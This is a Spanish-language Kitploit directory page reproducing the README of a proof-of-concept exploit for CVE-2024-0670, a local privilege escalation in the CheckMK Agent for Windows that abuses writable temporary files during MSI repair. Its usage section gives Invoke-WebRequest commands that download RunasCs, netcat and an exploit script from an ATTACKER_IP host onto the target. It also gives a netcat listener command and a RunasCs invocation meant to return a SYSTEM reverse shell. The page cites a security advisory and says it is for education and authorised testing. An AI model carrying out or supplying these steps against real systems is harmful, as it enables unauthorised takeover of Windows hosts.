Skip to content
KitploitKITPLOIT
HerramientasBlog
Log in
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

FeedsContactoPrivacidad© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-0670-CheckMK-Agent-Local-Privilege-Escalation-Exploit — Este repositorio contiene una demostración de explotación para CVE-2024-0670, una vulnerabilidad de escalada de privilegios local que afecta al CheckMK Agent para Windows. La vulnerabilidad permite que un usuario con pocos privilegios obtenga privilegios de SYSTEM abusando de rutas de archivos editables procesadas por el mecanismo de reparación de MSI. | Kitploit
Herramientas/GitHubGitHub/elsevar11/cve-2024-0670-checkmk-agent-local-privilege-escalation-exploit
Escalada de PrivilegiosGeneración de PayloadsAnálisis de VulnerabilidadesExplotaciónPruebas de PenetraciónAprendizaje y EducaciónExplotación de Binarios
GitHub

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →

Acerca de

Este repositorio contiene una demostración de explotación para CVE-2024-0670, una vulnerabilidad de escalada de privilegios local que afecta al CheckMK Agent para Windows. La vulnerabilidad permite que un usuario con pocos privilegios obtenga privilegios de SYSTEM abusando de rutas de archivos editables procesadas por el mecanismo de reparación de MSI.

elsevar11/cve-2024-0670-checkmk-agent-local-privilege-escalation-exploit

CVE-2024-0670-CheckMK-Agent-Local-Privilege-Escalation-Exploit

Ver Repositorio
316hace 10 mesesAún no revisado
Compartir

CVE-2024-0670 – Escalada de Privilegios Local del Agente CheckMK (PoC)

Este repositorio contiene una prueba de concepto simple y limpia para CVE-2024-0670, una vulnerabilidad de escalada de privilegios local en el Agente CheckMK para Windows. Un usuario con bajos privilegios puede obtener privilegios de SYSTEM abusando de rutas de archivos temporales escribibles ejecutadas durante la reparación de MSI.

🔍 Resumen de la Vulnerabilidad

  • Proveedor: Tribe29
  • CVE: CVE-2024-0670
  • Aviso: https://sec-consult.com/vulnerability-lab/advisory/local-privilege-escalation-via-writable-files-in-checkmk-agent/

Durante una reparación de MSI, CheckMK ejecuta archivos en:

  C:\Windows\Temp\

Si un usuario normal puede colocar archivos allí con nombres predecibles, puede ejecutar comandos como NT AUTHORITY\SYSTEM.

Este exploit siembra múltiples nombres de archivos de payload y desencadena la reparación de MSI para lograr ejecución como SYSTEM.

📂 Archivos

RunasCs.exe     → runas replacement (plaintext password support)
nc.exe          → Netcat (reverse shell)
exploit.ps1     → CVE-2024-0670 exploit script
README.md       → documentation

🛠 Requisitos

  • Usuario de Windows con bajos privilegios
  • PowerShell habilitado
  • Agente CheckMK para Windows instalado
  • Capacidad de descargar archivos
  • Python (para un servidor HTTP simple)
  • Listener de Netcat en la máquina atacante

📡 Iniciar Servidor HTTP

  C:\Windows\Temp\

📥 Descargar Herramientas en el Objetivo

Invoke-WebRequest -Uri "http://ATTACKER_IP:8000/RunasCs.exe" -OutFile "C:\Windows\Temp\RunasCs.exe"
Invoke-WebRequest -Uri "http://ATTACKER_IP:8000/nc.exe" -OutFile "C:\Windows\Temp\nc.exe"
Invoke-WebRequest -Uri "http://ATTACKER_IP:8000/exploit.ps1" -OutFile "C:\Windows\Temp\exploit.ps1

🚀 Ejecutar el Exploit

Inicie un listener en su máquina:

nc -lvnp 1111
.\RunasCs.exe username "password" "powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Windows\Temp\exploit.ps1"

Si tiene éxito, recibirá una reverse shell como SYSTEM.

🔧 Compilar RunasCs Manualmente (Opcional)

net4: 
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe -target:exe -optimize -out:RunasCs.exe RunasCs.cs 

net2: 
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe -target:exe -optimize -out:RunasCs_net2.exe RunasCs.cs

⚖️ Aviso Legal

Este proyecto es solo para fines educativos y de pruebas de penetración autorizadas. No lo utilice con fines ilegales. El autor no es responsable por el mal uso.

Descargar herramienta